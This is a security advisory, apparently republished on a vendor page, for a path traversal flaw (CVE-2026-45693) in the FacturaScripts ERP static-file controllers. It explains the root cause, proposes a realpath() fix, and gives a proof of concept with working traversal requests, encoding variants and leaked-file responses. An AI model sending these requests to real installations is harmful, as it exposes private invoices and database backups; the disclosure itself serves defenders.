Summary
FacturaScripts: Unauthenticated Path Traversal in Static File Controllers Reads Private MyFiles Documents
The static file controllers in FacturaScripts decide whether a request is authorized by looking at the URL string instead of the canonical filesystem path. A request that starts with an allow-listed folder name but contains a ../ segment in the middle ends up serving a file from a different directory than the one the URL pretended to point at. This makes any file inside the FacturaScripts installation readable without authentication as long as the file's extension is on the controllers' allow-list (pdf, xlsx, docx, csv, sql, zip, xml, json, xsig, etc.). In practice this leaks the documents the application is specifically designed to protect: customer invoices, supplier invoices, document attachments and database backups stored under MyFiles/Private/ and other non-public subfolders.
The two vulnerable controllers are Core/Controller/Files.php (used by the /Plugins/*, /Core/Assets/*, /Dinamic/Assets/* and /node_modules/* routes) and Core/Controller/Myfiles.php (used by /MyFiles/*). Both share the same root cause: a strpos() / substr() prefix check on the raw URL is treated as proof that the resolved file lives inside an authorized directory.
The /Plugins/* route via Files.php is the cleanest exploit path because Plugins/ is part of every FacturaScripts installation, so no precondition is required. The /MyFiles/* route via Myfiles.php is a second path with the same root cause: when the URL starts with /MyFiles/Public/, the controller exits early and skips the per-file myft token check, which can be combined with ../ to read tokenless files outside Public/.
Tested live on commit de01369 (master, 2026-05-11) and on tag v2026.2, with PHP 8.0.30 on Apache 2.4.56.
Details
Path 1, in Core/Controller/Files.php
Files::__construct concatenates the project folder with the request URL and then runs two safety checks before serving the file:
$this->filePath = Tools::folder() . $url;
if (false === is_file($this->filePath)) {
throw new KernelException('FileNotFound', ...);
}
if (false === $this->isFolderSafe($url)) {
throw new KernelException('UnsafeFolder', $url);
}
if (false === $this->isFileSafe($this->filePath)) {
throw new KernelException('UnsafeFile', $url);
}
isFolderSafe() only inspects the URL string:
public static function isFolderSafe(string $filePath): bool
{
$safeFolders = ['node_modules', 'vendor', 'Dinamic', 'Core', 'Plugins', 'MyFiles/Public'];
foreach ($safeFolders as $folder) {
if ('/' . $folder === substr($filePath, 0, 1 + strlen($folder))) {
return true;
}
}
return false;
}
For a request like /Plugins/../MyFiles/Private/invoice-2026-001.pdf, substr($url, 0, 8) equals /Plugins, so isFolderSafe() returns true. The filesystem layer then resolves the .. segment when is_file() runs, so the actual file opened is /MyFiles/Private/invoice-2026-001.pdf. isFileSafe() only checks the trailing extension, which is pdf and on the allow-list, so the file is served.
Path 2, in Core/Controller/Myfiles.php
The dedicated MyFiles handler resolves the path with urldecode() and reproduces the same prefix-based logic to decide whether the per-file myft token is required:
$this->filePath = Tools::folder() . urldecode($url);
if (false === is_file($this->filePath)) {
throw new KernelException('FileNotFound', ...);
}
if (false === $this->isFileSafe($this->filePath)) {
throw new KernelException('UnsafeFile', $url);
}
// if the folder is MyFiles/Public, then we don't need to check the token
if (strpos($url, '/MyFiles/Public/') === 0) {
return;
}
$fixedFilePath = substr(urldecode($url), 1);
$token = filter_input(INPUT_GET, 'myft');
if (empty($token) || false === MyFilesToken::validate($fixedFilePath, $token)) {
throw new KernelException('MyfilesTokenError', $fixedFilePath);
}
A request to /MyFiles/Public/../Private/invoice-2026-001.pdf satisfies strpos($url, '/MyFiles/Public/') === 0, so the controller returns early and skips myft token validation. The .. segment is then resolved by is_file() and readfile() against the real filesystem path inside MyFiles/Private/.
This second path is only exploitable when a MyFiles/Public/ directory exists on disk, which is the case in any installation that has ever published a public asset (company logo, theme file, plugin static resource).
Why this is not the documented "Public folder" behaviour
MyFiles/Public/ is intentionally tokenless for assets that live inside it, and that part is by design. The behaviour shown here is different: the URL appears to point at MyFiles/Public/... but the file ultimately returned lives in MyFiles/Private/. The same file (MyFiles/Private/invoice-2026-001.pdf) is returned with HTTP 403 (Invalid token) when requested directly, and HTTP 200 with the file body when requested through the traversal sequence. The access decision is not consistent with the actual file location, which is the textbook definition of a path traversal flaw.
PoC
The PoC uses one sample invoice planted at MyFiles/Private/invoice-2026-001-ACME.pdf (215 bytes) on a fresh install:
%PDF-FAKE-CONTENT for FacturaScripts PoC
INVOICE: 2026-001
CLIENT: ACME Corporation
TAX ID: B-12345678
AMOUNT: EUR 42,000.00
DUE DATE: 2026-06-15
PAID: 2026-05-09
INTERNAL NOTE: confidential customer financial data
Step 1, control. Direct access without a token is blocked:
GET /MyFiles/Private/invoice-2026-001-ACME.pdf HTTP/1.1
Host: 127.0.0.1:8088
HTTP/1.1 403 Forbidden
<title>Invalid token.</title>
<p>The access token for the file MyFiles/Private/invoice-2026-001-ACME.pdf is invalid or has expired</p>
Step 2, exploit via /Plugins/*. This is the no-precondition path:
GET /Plugins/../MyFiles/Private/invoice-2026-001-ACME.pdf HTTP/1.1
Host: 127.0.0.1:8088
HTTP/1.1 200 OK
Content-Length: 215
Content-Type: application/pdf
%PDF-FAKE-CONTENT for FacturaScripts PoC
INVOICE: 2026-001
CLIENT: ACME Corporation
TAX ID: B-12345678
AMOUNT: EUR 42,000.00
DUE DATE: 2026-06-15
PAID: 2026-05-09
INTERNAL NOTE: confidential customer financial data
The same file that returned 403 in Step 1 is now returned without authentication. /Core/Assets/* and /Dinamic/Assets/* behave the same way against the same controller; /Plugins/* is used here because the folder is guaranteed to exist.
Step 3, exploit via /MyFiles/Public/*. This path also bypasses the myft token check:
GET /MyFiles/Public/../Private/invoice-2026-001-ACME.pdf HTTP/1.1
Host: 127.0.0.1:8088
HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000, immutable
Content-Length: 215
Content-Type: application/pdf
%PDF-FAKE-CONTENT for FacturaScripts PoC
...
A quick check shows that several encoding variants of .. also work: %2e%2e, %2E%2E, .%2e, ///../. The flaw lives in the prefix check, not in any specific Apache normalization.
The file is confirmed present on disk:
Affected request paths
| URL pattern | Controller | Token required | Result |
|---|---|---|---|
/MyFiles/Private/invoice.pdf |
Myfiles | yes | 403 (control) |
/Plugins/../MyFiles/Private/invoice.pdf |
Files | n/a | 200 (leak) |
/Core/Assets/../MyFiles/Private/invoice.pdf |
Files | n/a | 200 (leak) |
/Dinamic/Assets/../MyFiles/Private/invoice.pdf |
Files | n/a | 200 (leak) |
/MyFiles/Public/../Private/invoice.pdf |
Myfiles | bypassed | 200 (leak) |
Affected Versions
Confirmed on the current master branch (commit de01369) and on the latest tagged release (v2026.2).
Impact
In a real ERP deployment this exposes the documents that the application is specifically designed to keep behind a per-file token:
- Customer and supplier invoices stored under
MyFiles/Private/ - Document attachments uploaded through
WidgetFileandDocFilesTrait(MyFiles/<filename>) - Database backups exported with
.sql - Cached or temporary business data under
MyFiles/Cache/andMyFiles/Tmp/
.php files are not on the extension allow-list, so the flaw does not lead to remote code execution. Files outside the FacturaScripts installation are rejected by Apache's URI normalization (AH10244 invalid URI path), so the leak is bounded to the application directory tree.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-45693 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
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Both controllers should resolve the requested path to its canonical form with realpath() and verify that the canonical path is inside an allow-listed directory before serving the file or skipping the token
check. Example for Files::__construct:
$this->filePath = Tools::folder() . $url;
if (false === is_file($this->filePath)) {
throw new KernelException('FileNotFound', ...);
}
$realPath = realpath($this->filePath);
$base = realpath(Tools::folder());
if ($realPath === false || strpos($realPath, $base . DIRECTORY_SEPARATOR) !== 0) {
throw new KernelException('UnsafeFolder', $url);
}
$safeFolders = ['node_modules', 'vendor', 'Dinamic', 'Core', 'Plugins', 'MyFiles' . DIRECTORY_SEPARATOR . 'Public'];
$relative = substr($realPath, strlen($base) + 1);
$allowed = false;
foreach ($safeFolders as $folder) {
if (strpos($relative, $folder . DIRECTORY_SEPARATOR) === 0) {
$allowed = true;
break;
}
}
if (!$allowed) {
throw new KernelException('UnsafeFolder', $url);
}
The same pattern applies to Myfiles::__construct: compare the canonical resolved path against realpath(Tools::folder() . '/MyFiles/Public') before skipping the myft token check.
Frequently Asked Questions
- What is CVE-2026-45693? CVE-2026-45693 is a high-severity path traversal vulnerability in facturascripts/facturascripts (composer), affecting versions <= 2026.2. No fixed version is listed yet. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-45693? CVE-2026-45693 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of facturascripts/facturascripts are affected by CVE-2026-45693? facturascripts/facturascripts (composer) versions <= 2026.2 is affected.
- Is there a fix for CVE-2026-45693? No fixed version is listed for CVE-2026-45693 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-45693 exploitable, and should I be worried? Whether CVE-2026-45693 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-45693 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-45693? No fixed version is listed yet. In the interim: Resolve the canonical path after applying any user-supplied input, and verify it remains within the intended directory before accessing it.